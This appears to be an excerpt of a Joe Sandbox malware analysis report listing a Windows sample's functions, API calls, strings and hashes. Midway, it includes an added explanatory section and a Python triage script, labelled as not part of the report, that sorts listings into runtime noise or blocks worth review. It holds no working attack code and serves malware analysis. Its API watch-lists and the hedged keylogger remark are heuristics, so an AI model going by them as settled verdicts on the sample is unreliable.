                                                                        • Opcode Fuzzy Hash: 986dee7bea969a3714e358a5090ab71fdb8d9d34e61384a774763969e3de55ca
                                                                        • Instruction Fuzzy Hash: 664104B110075C6FDB328B249C95FFF7BE8AB45304F2484E8E59A87182D2729B459F61
                                                                        APIs
                                                                        • _ValidateScopeTableHandlers.LIBCMT ref: 00C84BC1
                                                                        • __FindPESection.LIBCMT ref: 00C84BDB
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: FindHandlersScopeSectionTableValidate
                                                                        • String ID:
                                                                        • API String ID: 876702719-0
                                                                        • Opcode ID: 7daa07b6a455c31b86b95303fe60a5723d3480313d26232eec387e36e0b94673
                                                                        • Instruction ID: d39e0a17c2c632f636ca62f94a66f8fa6012889354e65f24676a6649920d7c32
                                                                        • Opcode Fuzzy Hash: 7daa07b6a455c31b86b95303fe60a5723d3480313d26232eec387e36e0b94673
                                                                        • Instruction Fuzzy Hash: 0491D572A0061A8BCB18EF59E88076DB7B6FB84319F15413DD825973A1E735ED02CB9C
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,00C7F75E,?,?,?), ref: 00C7F61A
                                                                        • _malloc.LIBCMT ref: 00C7F64F
                                                                          • Part of subcall function 00C822D3: _strlen.LIBCMT ref: 00C82355
                                                                          • Part of subcall function 00C822D3: _memset.LIBCMT ref: 00C823CD
                                                                          • Part of subcall function 00C822D3: MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,00000000,?,?,?,?,?,00C7F75E,?), ref: 00C823E4
                                                                        • _memset.LIBCMT ref: 00C7F66F
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,?,?,?,00000001), ref: 00C7F684
                                                                        • __freea.LIBCMT ref: 00C7F69C
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$_memset$__freea_malloc_strlen
                                                                        • String ID:
                                                                        • API String ID: 574822426-0
                                                                        • Opcode ID: b03797cdf264254de9d84621db7f184553ac7eafa7fa4baa5082a74e655da8aa
                                                                        • Instruction ID: e8b3aeb3899a7fb4fee85d480a75413c3acd4b6fca1b9104cc4dd48cccc620da
                                                                        • Opcode Fuzzy Hash: b03797cdf264254de9d84621db7f184553ac7eafa7fa4baa5082a74e655da8aa
                                                                        • Instruction Fuzzy Hash: 3951907250010AEFDF10AF64DCC29AE7BA9FB08354B14853EF928C7161D731DE629BA0
                                                                        APIs
                                                                        • __CreateFrameInfo.LIBCMT ref: 00C84031
                                                                          • Part of subcall function 00C83921: __getptd.LIBCMT ref: 00C8392F
                                                                          • Part of subcall function 00C83921: __getptd.LIBCMT ref: 00C8393D
                                                                        • __getptd.LIBCMT ref: 00C8403B
                                                                          • Part of subcall function 00C7B7E6: __amsg_exit.LIBCMT ref: 00C7B7F6
                                                                        • __getptd.LIBCMT ref: 00C84049
                                                                        • __getptd.LIBCMT ref: 00C84057
                                                                        • __getptd.LIBCMT ref: 00C84062
                                                                          • Part of subcall function 00C839C6: __CallSettingFrame@12.LIBCMT ref: 00C83A12
                                                                          • Part of subcall function 00C8412F: __getptd.LIBCMT ref: 00C8413E
                                                                          • Part of subcall function 00C8412F: __getptd.LIBCMT ref: 00C8414C
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit
                                                                        • String ID:
                                                                        • API String ID: 3174811152-0
                                                                        • Opcode ID: f5730c61f12492576a0eef748da0d4b7c96fa780323b55037cc51f2a27ed6653
                                                                        • Instruction ID: 122a421715192ed4fbdaaa695c492b3103ff7e6536a00760abbab6b782f6bf2b
                                                                        • Opcode Fuzzy Hash: f5730c61f12492576a0eef748da0d4b7c96fa780323b55037cc51f2a27ed6653
                                                                        • Instruction Fuzzy Hash: 3711F6B1C042099FDB04EFA4C986BAD7BB0FF44314F10C469F818A7252EB789A11AB64
                                                                        APIs
                                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 009784C3
                                                                        • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,00978540,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 009784F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000971000.00000020.00000001.01000000.00000007.sdmp, Offset: 00971000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_971000_windows10.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InformationLogicalProcessor
                                                                        • String ID: GetLogicalProcessorInformation$kernel32.dll
                                                                        • API String ID: 1773637529-812649623
                                                                        • Opcode ID: 33422deee359ae11425648c061e1e5bb786d0ec9d8b59d0dc3b1dcd677ae6459
                                                                        • Instruction ID: b8b2471d189087220cdcf84447b39896ddc3db897475dc4b42e063e423366a0f
                                                                        • Opcode Fuzzy Hash: 33422deee359ae11425648c061e1e5bb786d0ec9d8b59d0dc3b1dcd677ae6459
                                                                        • Instruction Fuzzy Hash: D7119373E48208AEEB10EBA4DC4AB5EB7E8DB80314F25C0E5F40C92182DF759A808615
                                                                        APIs
                                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 009784C3
                                                                        • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,00978540,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 009784F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000971000.00000020.00000001.01000000.00000007.sdmp, Offset: 00971000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_971000_windows10.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InformationLogicalProcessor
                                                                        • String ID: GetLogicalProcessorInformation$kernel32.dll
                                                                        • API String ID: 1773637529-812649623
                                                                        • Opcode ID: 359933d5c716c6fe3d8d4ecd298042ebb2d6ae9b377f8f733b2166840254b838
                                                                        • Instruction ID: b8f67dedddb60dc6f857b824dad06f67c1ee036816438cb70fe0dca4925248f8
                                                                        • Opcode Fuzzy Hash: 359933d5c716c6fe3d8d4ecd298042ebb2d6ae9b377f8f733b2166840254b838
                                                                        • Instruction Fuzzy Hash: 91018473E88208AEEB10EBA08C4AB6EB7EDDB80314F15C0A5F40CD6081EF71DA808614
                                                                        APIs
                                                                        • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0097C871
                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0097C8CF
                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0097C92C
                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0097C95F
                                                                          • Part of subcall function 0097C81C: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0097C8DD), ref: 0097C833
                                                                          • Part of subcall function 0097C81C: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0097C8DD), ref: 0097C850
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000971000.00000020.00000001.01000000.00000007.sdmp, Offset: 00971000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_971000_windows10.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Thread$LanguagesPreferred$Language
                                                                        • String ID:
                                                                        • API String ID: 2255706666-0
                                                                        • Opcode ID: b2b42e253ab3a32aa013e25affa429a88c8d471ff2c418362df6d001af0f5bf1
                                                                        • Instruction ID: 611c4fadf09155700dbb28cebb3b0b836aa5d4894e3cfc83ef5fd34ee5db0365
                                                                        • Opcode Fuzzy Hash: b2b42e253ab3a32aa013e25affa429a88c8d471ff2c418362df6d001af0f5bf1
                                                                        • Instruction Fuzzy Hash: A03160B1E0021E9BDB10DFE8C885BEEB3B8FF44310F548169E559E7291D7749A44CB51
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,00C7F75E,?,?,?), ref: 00C7F61A
                                                                        • _memset.LIBCMT ref: 00C7F66F
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,?,?,?,00000001), ref: 00C7F684
                                                                        • __freea.LIBCMT ref: 00C7F69C
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$__freea_memset
                                                                        • String ID:
                                                                        • API String ID: 2568176243-0
                                                                        • Opcode ID: ce43943b9868d0d07ff706dc16f5697e0d9e9d783e2b1ff9a25ee9727d7f8d94
                                                                        • Instruction ID: 998f23053daca967fddf046a5786c9484adf2f06f0e59a402b95a4611c4a84a3
                                                                        • Opcode Fuzzy Hash: ce43943b9868d0d07ff706dc16f5697e0d9e9d783e2b1ff9a25ee9727d7f8d94
                                                                        • Instruction Fuzzy Hash: 1D21507160010AEFDF109F68DCC2AAE3BA9EB14354F158439F919D6161D731DE629BA0
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32(00000000,?,00C7B635), ref: 00C7B5AC
                                                                        • TlsGetValue.KERNEL32(00C8C658,?,00C7B635), ref: 00C7B5C3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID: DecodePointer$KERNEL32.DLL
                                                                        • API String ID: 3702945584-629428536
                                                                        • Opcode ID: 3094cd1d2544d07f2a8755f20a72c5377bef8308db81acb2d1ed3a12b8ea416b
                                                                        • Instruction ID: 363727ae34dc969be8efd2c6741dbfa3d8a34e2ae714f0aefa58c68ceea3ac6e
                                                                        • Opcode Fuzzy Hash: 3094cd1d2544d07f2a8755f20a72c5377bef8308db81acb2d1ed3a12b8ea416b
                                                                        • Instruction Fuzzy Hash: 3AF0627060411AAA8F556B26ED81F6B3B9D9F403A07148231FC2DD6160EF30CE0197F8
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32(00000000,?,00C7B598,00000000,00C8273C,00C8F6D0,00000000,00000314,?,00C80261,00C8F6D0,Microsoft Visual C++ Runtime Library,00012010), ref: 00C7B531
                                                                        • TlsGetValue.KERNEL32(00C8C658,?,00C7B598,00000000,00C8273C,00C8F6D0,00000000,00000314,?,00C80261,00C8F6D0,Microsoft Visual C++ Runtime Library,00012010), ref: 00C7B548
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID: EncodePointer$KERNEL32.DLL
                                                                        • API String ID: 3702945584-3682587211
                                                                        • Opcode ID: 33863ef9aef063c691fd036e033bc646ab03d18ca80fe029e26bbd7404ff4611
                                                                        • Instruction ID: decf36e1679f282b37378a9f3fc07195287dbc6a5df0706b9c796f1e5c6b9791
                                                                        • Opcode Fuzzy Hash: 33863ef9aef063c691fd036e033bc646ab03d18ca80fe029e26bbd7404ff4611
                                                                        • Instruction Fuzzy Hash: 7DF06270600116AA8B91AB7ADD44F6E3FAD9F453A07148131FC2CE6161EB31DE0187E4
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: CallFrame@12Setting__getptd
                                                                        • String ID: j
                                                                        • API String ID: 3454690891-2137352139
                                                                        • Opcode ID: 669a8888bf1fcff3379f13a75e8a79c2290ad9751b26e3d1a2780ee6703f8e9e
                                                                        • Instruction ID: 34768605c69c1377b6e797b71aa09bb57387763433b91d38d8097ebb8e8de2ce
                                                                        • Opcode Fuzzy Hash: 669a8888bf1fcff3379f13a75e8a79c2290ad9751b26e3d1a2780ee6703f8e9e
                                                                        • Instruction Fuzzy Hash: 1A11E171904291DFCB12EF69C4443ACBFB0BF05B08F18858AD4A86F283C375AE41DB89
                                                                        APIs
                                                                        • ___BuildCatchObject.LIBCMT ref: 00C843C9
                                                                          • Part of subcall function 00C84324: ___BuildCatchObjectHelper.LIBCMT ref: 00C8435A
                                                                        • _UnwindNestedFrames.LIBCMT ref: 00C843E0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                        • String ID: csm
                                                                        • API String ID: 3487967840-1018135373
                                                                        • Opcode ID: d7cfb688f90cc76fd5960e040264083c7c1c916bb07f4d54eefe1401d8d22a85
                                                                        • Instruction ID: 116f7e2db9370c8f9706dedbdd27c4d7eca74b09611721ea74a5892cb29ffe53
                                                                        • Opcode Fuzzy Hash: d7cfb688f90cc76fd5960e040264083c7c1c916bb07f4d54eefe1401d8d22a85
                                                                        • Instruction Fuzzy Hash: DA01463500010ABBCF166F51CC45EEA3F6AFF08349F008014FD1815120E772DAB1EBA8
                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 00C8413E
                                                                          • Part of subcall function 00C7B7E6: __amsg_exit.LIBCMT ref: 00C7B7F6
                                                                        • __getptd.LIBCMT ref: 00C8414C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: __getptd$__amsg_exit
                                                                        • String ID: csm
                                                                        • API String ID: 1969926928-1018135373
                                                                        • Opcode ID: 9d7e085454ab6c2d7cb152083fa03de183894ad01705aed6babd743c65a25248
                                                                        • Instruction ID: ec8af4c2312ae967076bc22aa4664b32ac82c1df87cfff25548efeaf567aad7f
                                                                        • Opcode Fuzzy Hash: 9d7e085454ab6c2d7cb152083fa03de183894ad01705aed6babd743c65a25248
                                                                        • Instruction Fuzzy Hash: 13014B368002069EDF38FFA4D4886ADB7B9AF20319F14446DE06096292DB309AC0DB59

                                                                        Execution Graph

                                                                        Execution Coverage:1.4%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:246
                                                                        Total number of Limit Nodes:25
                                                                        execution_graph: serialized node/edge list of the recorded call graph (rendered graph not reproduced). API calls named on graph nodes: RegOpenKeyExW, GetFileVersionInfoSizeW, GetFileVersionInfoW, TlsGetValue, TlsSetValue, RtlAllocateHeap, HeapFree, GetNativeSystemInfo, KiUserCallbackDispatcher, GlobalAddAtomW, SetErrorMode, LoadIconW, LoadCursorW, SystemParametersInfoW, WriteProcessMemory.

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GlobalAddAtomW.KERNEL32(00000000), ref: 00B19350
                                                                          • Part of subcall function 00B19070: SetErrorMode.KERNELBASE(00008000), ref: 00B19084
                                                                          • Part of subcall function 00B19070: SetErrorMode.KERNELBASE(?,00B190D0), ref: 00B190C3
                                                                          • Part of subcall function 00BAE394: LoadIconW.USER32(00BD4040,MAINICON,?,?,?,00B19410), ref: 00BAE4BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_acd000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$AtomGlobalIconLoad
                                                                        • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$DelphiRM_GetObjectInstance$USER32
                                                                        • API String ID: 1953398334-1139167764
                                                                        • Opcode ID: 1c95ce4c36e97c6fcfdb48dcd49fe51db96fc80a9add1da6eed97a1b8032b9d3
                                                                        • Instruction ID: eb676cbad24aaa0b91f0ea24cc2153ef68e0799743882eefd44177d352ddbfe0
                                                                        • Opcode Fuzzy Hash: 1c95ce4c36e97c6fcfdb48dcd49fe51db96fc80a9add1da6eed97a1b8032b9d3
                                                                        • Instruction Fuzzy Hash: 0B4171746102459FCB00EFB8ECA2A9DB7E8FB55300B404475F514D73A2EF349A44CB61
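
The function listings in this report share one record shape: an APIs section (top-level calls plus "Part of subcall function" entries, each with module and ref address), an optional Strings section with xrefs, a Memory Dump Source line carrying the dump offset, and a Similarity section whose String ID field repeats the strings joined by "$". Most functions broken out on this page are framework code rather than sample logic: GlobalAddAtomW together with the Delphi%.8X, ControlOfs%.8X%.8X and DelphiRM_GetObjectInstance strings is Delphi VCL control initialisation, the imm32.dll load wrapped in SetErrorMode(0x8000, SEM_NOOPENFILEERRORBOX) is the same runtime, and the LIBCMT entries (__RTC_Initialize, __cinit, _malloc, std::bad_alloc) are MSVC CRT start-up. The execution graph, by contrast, also reaches a WriteProcessMemory call at beb7e2 that is not broken out here. The Python script below is an added example, not part of the Joe Sandbox report or its tooling: it parses listing blocks of this shape and tags each as CRT noise, VCL noise or worth review, so triage time goes to the sample's own code. The marker-string and interesting-API sets are analyst heuristics (assumptions); the sample input is copied from the listings on this page.

```python
"""Triage helper for Joe Sandbox function-listing blocks (APIs / Strings /
Memory Dump Source / Similarity records). Added example, not report tooling.
Classification rules are analyst heuristics (assumptions), not report facts."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Assumed heuristic: strings that mark Delphi VCL runtime initialisation.
VCL_MARKER_STRINGS = {
    "Delphi%.8X", "ControlOfs%.8X%.8X", "DelphiRM_GetObjectInstance",
    "MAINICON", "imm32.dll",
}
# Assumed heuristic: APIs an analyst reads first in a call graph.
INTERESTING_APIS = {
    "WriteProcessMemory", "CreateRemoteThread", "VirtualAllocEx",
    "SetWindowsHookExW", "RegOpenKeyExW", "GetNativeSystemInfo",
}
# Matches "Name.MODULE(args), ref: ADDR" and "Name.LIBCMT ref: ADDR",
# optionally prefixed by "Part of subcall function ADDR: ".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<name>[A-Za-z_][\w:]*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Similarity"}


@dataclass
class ApiCall:
    name: str
    module: str
    ref: str
    args: list
    caller: Optional[str]  # set for "Part of subcall function" entries


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    offset: str = ""   # dump offset from the Memory Dump Source line
    snapshot: str = ""


def parse_blocks(report_text: str) -> list:
    """Split at each 'Control-flow Graph' header and parse the bullet lines."""
    blocks, cur, section = [], None, None
    for raw in report_text.splitlines():
        line = raw.strip()
        if line.startswith("Control-flow Graph"):
            cur, section = FunctionBlock(), None
            blocks.append(cur)
            continue
        if cur is None:
            continue
        if line in SECTIONS:
            section = line
            continue
        if not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                args = [a for a in (m.group("args") or "").split(",") if a]
                cur.apis.append(ApiCall(m["name"], m["module"], m["ref"], args, m["caller"]))
        elif section == "Strings" and ", xrefs: " in body:
            cur.strings.append(body.rsplit(", xrefs: ", 1)[0])
        elif section == "Memory Dump Source":
            m = re.search(r"Offset: ([0-9A-F]+)", body)
            if m:
                cur.offset = m.group(1)
            m = re.search(r"Snapshot File: (\S+)", body)
            if m:
                cur.snapshot = m.group(1)
        elif section == "Similarity" and body.startswith("String ID:"):
            # String ID repeats the strings even when the Strings section is empty.
            for s in body[len("String ID:"):].strip().split("$"):
                if s and s not in cur.strings:
                    cur.strings.append(s)
    return blocks


def classify(block: FunctionBlock) -> str:
    """crt-noise / vcl-noise for framework code, review for interesting APIs."""
    top = [a for a in block.apis if a.caller is None]
    if top and all(a.module == "LIBCMT" for a in top):
        return "crt-noise"
    if set(block.strings) & VCL_MARKER_STRINGS:
        return "vcl-noise"
    if {a.name for a in block.apis} & INTERESTING_APIS:
        return "review"
    return "other"


def triage(report_text: str) -> list:
    """One summary dict per function block, tagged so noise can be skipped."""
    return [{
        "offset": b.offset,
        "tag": classify(b),
        "apis": sorted({a.name for a in b.apis if a.caller is None}),
        "subcall_apis": sorted({a.name for a in b.apis if a.caller is not None}),
        "strings": list(b.strings),
    } for b in parse_blocks(report_text)]


# Sample input copied from the listings on this page (three blocks).
SAMPLE_REPORT = r"""
Control-flow Graph
APIs
• GlobalAddAtomW.KERNEL32(00000000), ref: 00B19350
  • Part of subcall function 00B19070: SetErrorMode.KERNELBASE(00008000), ref: 00B19084
  • Part of subcall function 00BAE394: LoadIconW.USER32(00BD4040,MAINICON,?,?,?,00B19410), ref: 00BAE4BC
Strings
Memory Dump Source
• Source File: 00000011.00000002.4174824901.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_acd000_windows10.jbxd
Similarity
• API ID: ErrorMode$AtomGlobalIconLoad
• String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$DelphiRM_GetObjectInstance$USER32
Control-flow Graph
APIs
• __RTC_Initialize.LIBCMT ref: 00BFA86C
• __mtterm.LIBCMT ref: 00BFA88F
  • Part of subcall function 00BFB649: TlsFree.KERNEL32(00C0C65C,00BFA8F6), ref: 00BFB674
• __cinit.LIBCMT ref: 00BFA8AA
Memory Dump Source
• Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
Similarity
• String ID:
Control-flow Graph
• Executed
• Not Executed
APIs
• RegOpenKeyExW.KERNELBASE(80000002,00000000), ref: 00BAD266
Strings
• layout text, xrefs: 00BAD297
• System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 00BAD250
Memory Dump Source
• Source File: 00000011.00000002.4174824901.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
Similarity
• String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
"""

if __name__ == "__main__":
    for row in triage(SAMPLE_REPORT):
        print(row["tag"], row["offset"], row["apis"], row["strings"])
```

The third block is left as "review" rather than tagged as noise: HKLM\System\CurrentControlSet\Control\Keyboard Layouts\<KLID> subkeys hold the "Layout Text" display name of each keyboard layout, so RegOpenKeyExW(HKEY_LOCAL_MACHINE, ...) with that path formats a layout ID into the key name and reads its description, a lookup GUI frameworks perform but also one a keylogger uses to label captured input; the analyst should look at the callers before dismissing it.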

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • __RTC_Initialize.LIBCMT ref: 00BFA86C
                                                                        • __mtterm.LIBCMT ref: 00BFA88F
                                                                          • Part of subcall function 00BFB649: TlsFree.KERNEL32(00C0C65C,00BFA8F6), ref: 00BFB674
                                                                        • __setenvp.LIBCMT ref: 00BFA89F
                                                                        • __cinit.LIBCMT ref: 00BFA8AA
                                                                        • __mtterm.LIBCMT ref: 00BFA8F1
                                                                        • __freeptd.LIBCMT ref: 00BFA961
                                                                          • Part of subcall function 00BFB615: TlsGetValue.KERNEL32(?,00BFB784), ref: 00BFB61E
                                                                          • Part of subcall function 00BFB615: TlsSetValue.KERNEL32(00000000), ref: 00BFB63F
                                                                          • Part of subcall function 00BFD6AF: __calloc_impl.LIBCMT ref: 00BFD6C0
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: Value__mtterm$FreeInitialize__calloc_impl__cinit__freeptd__setenvp
                                                                        • String ID:
                                                                        • API String ID: 2350678278-0
                                                                        • Opcode ID: d16c792c564670ba1b86d74d927a25730e30b85192023b1dd84fb5ee3bf32d4f
                                                                        • Instruction ID: f64f2a478e634570c8f0f6d208d266b769087dd454550bf204c2f94335498ce5
                                                                        • Opcode Fuzzy Hash: d16c792c564670ba1b86d74d927a25730e30b85192023b1dd84fb5ee3bf32d4f
                                                                        • Instruction Fuzzy Hash: 862195B150424D999A2D37B19C4273E33E9DE507A0B2141FAFB19D3192EBA0C84E9563

                                                                        Control-flow Graph

                                                                        control_flow_graph: basic-block list for the function at 0x00BF9748 (serialized graph data with executed/not-executed colouring; rendered graph not reproduced)
                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 00BF9A18
                                                                          • Part of subcall function 00BFC0B6: __FF_MSGBANNER.LIBCMT ref: 00BFC0D9
                                                                          • Part of subcall function 00BFC0B6: __NMSG_WRITE.LIBCMT ref: 00BFC0E0
                                                                          • Part of subcall function 00BFC0B6: RtlAllocateHeap.NTDLL(00000000,?,00000001), ref: 00BFC12D
                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 00BF9A3B
                                                                          • Part of subcall function 00BF9994: std::exception::exception.LIBCMT ref: 00BF99A0
                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 00BF9A4F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                        • String ID: PU'
                                                                        • API String ID: 832318072-4254717615
                                                                        • Opcode ID: b613c0d7c0ea77554799149e1680cf0c84d9b3254bd149dcfea0352e342adf7e
                                                                        • Instruction ID: 3648112d81437b8c644b9c83ee2dc51648abf5ca7bd2a91fbe63d0fa4b4afe67
                                                                        • Opcode Fuzzy Hash: b613c0d7c0ea77554799149e1680cf0c84d9b3254bd149dcfea0352e342adf7e
                                                                        • Instruction Fuzzy Hash: 22014C3140420D6ACF34B765D802BBE3BD8CB80728B1480F5FA05975E2DE71DD8EC691

                                                                        Control-flow Graph

                                                                        control_flow_graph: basic-block list for the function at 0x00BAD1A8 (serialized graph data with executed/not-executed colouring; rendered graph not reproduced)
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(80000002,00000000), ref: 00BAD266
                                                                        Strings
                                                                        • layout text, xrefs: 00BAD297
                                                                        • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 00BAD250
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_acd000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: Open
                                                                        • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                        • API String ID: 71445658-2652665750
                                                                        • Opcode ID: 1e904e6baa49bde0ca5e0c38124d7ac03643cc4edf114ff24013146a2408addd
                                                                        • Instruction ID: 49f2b7b088fac2598c3a4c1a948244a5982aef24147e978703b2f46d72a5fa7d
                                                                        • Opcode Fuzzy Hash: 1e904e6baa49bde0ca5e0c38124d7ac03643cc4edf114ff24013146a2408addd
                                                                        • Instruction Fuzzy Hash: 73412874A04208AFDB11DF98C982BADB7F9FB4A300F5040E5EA05E7651E770AF44CB66

                                                                        Control-flow Graph

                                                                        control_flow_graph: basic-block list for the function at 0x00B19070 (serialized graph data with executed/not-executed colouring; rendered graph not reproduced)
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008000), ref: 00B19084
                                                                        • SetErrorMode.KERNELBASE(?,00B190D0), ref: 00B190C3
                                                                        Strings
